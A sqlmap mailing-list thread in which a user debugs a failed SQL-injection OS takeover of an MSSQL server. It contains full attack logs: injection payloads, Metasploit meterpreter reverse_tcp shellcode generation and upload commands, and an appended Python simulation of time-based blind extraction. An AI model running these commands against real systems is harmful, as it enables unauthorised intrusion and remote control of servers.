Re: [sqlmap-users] Error with operating system takeover (meterpreter)
From: Miroslav S. <mir...@gm...> - 2015-07-02 08:41:43
In your case, 404 is an indication that the file has not been found in the expected place. Now I see that the temporary file path is not being "refreshed" by --fresh-queries. Please rerun the whole case with --flush-session.

Bye

P.S. In your case sqlmap tried to upload the file to the trashy location because of the previously retrieved faulty temp location.

On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...> wrote:
> Hi,
> Thanks for your reply.
>
> This time I tried with --fresh-queries without a specific --technique.
>
> Why am I getting the error "page not found (404)" again and again? Does it
> indicate that the file is being written but is deleted by anti-virus control or
> something, and that's why, while calling the uploaded file, the 404 error is
> appearing? Can this be the case? Need your opinion and expertise.
>
> Thanks
>
> --start---
>
> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
>
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> > 1
> [11:12:52] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
> [11:12:52] [INFO] creation in progress .................. done
> [11:13:10] [DEBUG] the shellcode size is 308 bytes
> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL injection technique
> [11:13:10] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt, please wait..
> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
> [11:13:12] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
> [11:13:12] [INFO] retrieved:
> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
> [11:13:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] y
> [11:13:15] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
> [11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait..
> [11:13:16] [CRITICAL] page not found (404)
> [11:13:16] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 1 times
> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>
> [*] shutting down at 11:13:16
>
> --end---
>
> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi.
>> That way you'll kill the possibility to get perfectly valid results with
>> other techniques.
>> 2) In the current state, you've got some "trashy" characters (because of the
>> combination of a laggy connection and stacked SQLi), like: "D:/Program
>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
>> --fresh-queries in such situations (once per run where you expect resume of
>> trashy chars) to force sqlmap to try to retrieve the problematic value once
>> again.
>>
>> Bye
>>
>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> wrote:
>>
>>> Hi All,
>>>
>>> In the first phase of our test we discovered the target URL is vulnerable and we
>>> managed to retrieve lots of information such as --users, --dbs, some of the
>>> --tables and lots more. All this retrieval was very slow, probably due to the
>>> time-based vulnerability; however, we tried all techniques (BEUSTQ) and found
>>> the same state.
>>>
>>> During an attempt a few days after our success we noticed some of the
>>> parameters are not working and we are receiving errors; for instance,
>>> during a requery for --users we received the error "[09:39:23] [CRITICAL] unable
>>> to retrieve the number of database users". During a requery for -U sa
>>> --passwords we received "unable to retrieve the password hashes for the
>>> database users (probably because the session user has no read privileges
>>> over the relevant system database table)".
>>>
>>> We moved to OS takeover, initially got an error for xp_cmdshell; however, we
>>> activated it and confirmed using SQLNinja, and moved on to get --os-shell,
>>> executed some commands like "hostname", "whoami" and successfully
>>> retrieved their output.
>>>
>>> Now after a few minutes we noted that we are not getting any output of any
>>> command, with the message "No output".
>>>
>>> We moved to --os-pwn + --msf-path, but again with no success on
>>> meterpreter or VNC. We received the error "HTTP error codes detected during run:
>>> 404 (Not Found) - 1 times".
>>>
>>> I'm attaching the screen log, please help me with this if there is any scope
>>> available.
>>> Thanks in advance.
>>>
>>> -------screen logs start-------
>>>
>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf7 -v 2
>>>         _
>>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>>> |_ -| . | |     | .'| . |
>>> |___|_  |_|_|_|_|__,|  _|
>>>       |_|           |_|   http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>
>>> [*] starting at 10:03:33
>>>
>>> mytarget_login
>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>>> [10:03:33] [DEBUG] not a valid WebScarab log data
>>> [10:03:33] [DEBUG] cleaning up configuration parameters
>>> test_msf7
>>> mytarget_login
>>> /opt/metasploit/apps/pro/msf3
>>> [10:03:33] [INFO] setting file for logging HTTP traffic
>>> [10:03:33] [DEBUG] setting the HTTP timeout
>>> [10:03:33] [DEBUG] creating HTTP requests opener object
>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>>> [10:03:33] [DEBUG] provided Metasploit Framework path '/opt/metasploit/apps/pro/msf3' is valid
>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>>> [10:03:33] [INFO] testing connection to the target URL
>>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>>> sqlmap got a 302 redirect to 'https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow? [Y/n] Y
>>> redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection reset by peer')
>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
>>> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
>>> ---
>>> Parameter: testNumber (POST)
>>>     Type: stacked queries
>>>     Title: Microsoft SQL Server/Sybase stacked queries
>>>     Payload: example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; WAITFOR DELAY '0:0:5'--&testPassword=3243
>>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>>> ---
>>> [10:03:56] [INFO] testing Microsoft SQL Server
>>> [10:03:56] [INFO] confirming Microsoft SQL Server
>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>>> back-end DBMS: Microsoft SQL Server 2008
>>> how do you want to establish the tunnel?
>>> [1] TCP: Metasploit Framework (default)
>>> [2] ICMP: icmpsh - ICMP tunneling
>>> > 1
>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>>> [10:04:00] [INFO] testing if current user is DBA
>>> [10:04:00] [DEBUG] creating a support table to write commands standard output to
>>> [10:04:00] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>> [10:04:04] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>>> which connection type do you want to use?
>>> [1] Reverse TCP: Connect back from the database host to this machine (default)
>>> [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports example3ween the specified and 65535
>>> [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
>>> [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
>>> [5] Bind TCP: Listen on the database host for a connection
>>> > 1
>>> what is the local address? [192.168.1.8]
>>> which local port number do you want to use? [61371]
>>> which payload do you want to use?
>>> [1] Meterpreter (default)
>>> [2] Shell
>>> [3] VNC
>>> > 1
>>> [10:04:17] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>>> [10:04:17] [INFO] creation in progress .................. done
>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL injection technique
>>> [10:04:35] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe'
>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt, please wait..
>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmppsbcbi.ps1
>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>>> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>>> [10:04:37] [INFO] retrieved:
>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>>> [10:04:37] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
>>> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] Y
>>> [10:04:41] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfegab.txt, please wait..
>>> [10:04:41] [CRITICAL] page not found (404)
>>> [10:04:41] [WARNING] HTTP error codes detected during run:
>>> 404 (Not Found) - 1 times
>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>>>
>>> [*] shutting down at 10:04:41
>>>
>>> root@kali:~#
>>>
>>> -------screen logs end-------
>>>
>>> Please help!!
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
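The "trashy" temp directory in the logs above ("MSSQ^10.MSSQLSERVER/MSSQLaLo Ā" instead of a sane instance path) is what a laggy link does to time-based blind inference: each character is recovered one bit at a time from whether the response arrived late, so a single network stall on a zero bit reads as a set bit and a wrong character is cached in the session. The simulation below is an added example written for this thread, not sqlmap's own code. The target, the lag model (a stall on every fifth request), the 7-bit LSB-first bit order, the fixed threshold, the Windows-path character class and the secret string "MSSQL10.MSSQLSERVER" are all constructed here for illustration; the `fresh_retrieve` function only mimics the idea behind --fresh-queries (re-read a value whose cached copy looks corrupted), not its implementation.

```python
"""
Simulation of bit-by-bit time-based blind SQL injection inference, showing how
a laggy connection turns characters into "trash" and how re-retrieving them with
a majority vote repairs the value. Added example, not sqlmap code: the target,
the network model, the bit order and the decision rule are constructed here.
"""
import re

DELAY_S = 5.0                # WAITFOR DELAY '0:0:5', as in the thread's payload
THRESHOLD_S = DELAY_S / 2    # naive rule: slower than this => condition was true
BITS_PER_CHAR = 7            # constructed choice: 7-bit ASCII, LSB first


class SimulatedTarget:
    """Stands in for the MSSQL host: answers
    '; IF(<bit of char N of SECRET is set>) WAITFOR DELAY ...' with a response time."""

    def __init__(self, secret, network):
        self.secret = secret
        self.network = network          # callable returning extra latency in seconds
        self.requests = 0

    def query_bit(self, pos, bit):
        self.requests += 1
        condition = (ord(self.secret[pos]) >> bit) & 1
        return (DELAY_S if condition else 0.0) + self.network()


def steady_network():
    """A good link: constant small round-trip overhead."""
    return 0.05


def make_laggy_network(spike_every=5, spike_s=6.0):
    """Constructed lag model: every spike_every-th request stalls for spike_s seconds,
    long enough to look like a WAITFOR DELAY that never happened."""
    counter = [0]

    def lag():
        counter[0] += 1
        return spike_s if counter[0] % spike_every == 0 else 0.05
    return lag


def naive_extract(target, length):
    """One request per bit, decided by a fixed threshold."""
    chars = []
    for pos in range(length):
        code = 0
        for bit in range(BITS_PER_CHAR):
            if target.query_bit(pos, bit) > THRESHOLD_S:
                code |= 1 << bit
        chars.append(chr(code))
    return "".join(chars)


def majority_extract(target, length, votes=3):
    """Ask for each bit `votes` times and take the majority; one stalled
    request can no longer flip a zero bit to one."""
    chars = []
    for pos in range(length):
        code = 0
        for bit in range(BITS_PER_CHAR):
            hits = sum(target.query_bit(pos, bit) > THRESHOLD_S for _ in range(votes))
            if 2 * hits > votes:
                code |= 1 << bit
        chars.append(chr(code))
    return "".join(chars)


# Characters we expect in a Windows path; anything else hints at a misread bit.
PATH_CHARS = re.compile(r"^[A-Za-z0-9 ._:\\/()\-]+$")


def looks_trashy(value):
    return not PATH_CHARS.match(value)


def fresh_retrieve(secret, length, network_factory):
    """Mimics re-retrieving a value whose cached copy looks corrupted: take the
    cheap reading first; only if it looks trashy go back with majority voting.
    Returns (value, retried)."""
    first = naive_extract(SimulatedTarget(secret, network_factory()), length)
    if not looks_trashy(first):
        return first, False
    retried = majority_extract(SimulatedTarget(secret, network_factory()), length)
    return retried, True


if __name__ == "__main__":
    secret = "MSSQL10.MSSQLSERVER"       # constructed: a plausible instance directory name
    good = naive_extract(SimulatedTarget(secret, steady_network), len(secret))
    bad = naive_extract(SimulatedTarget(secret, make_laggy_network()), len(secret))
    fixed, retried = fresh_retrieve(secret, len(secret), make_laggy_network)
    print("steady link :", good)
    print("laggy link  :", bad, "(trashy)" if looks_trashy(bad) else "")
    print("re-retrieved:", fixed, "(after retry)" if retried else "")
```

On the steady link the naive extractor reads the secret back exactly; on the laggy link the very first stall lands on bit 4 of the first character and turns "M" into "]", which is the same class of damage as the "^" and "Ā" in the thread. Re-reading with three votes per bit recovers the value because at most one of three consecutive requests can hit a stall in this model; in practice the cost is three times the requests, which is why re-retrieval is worth doing only for values that look wrong rather than for the whole session.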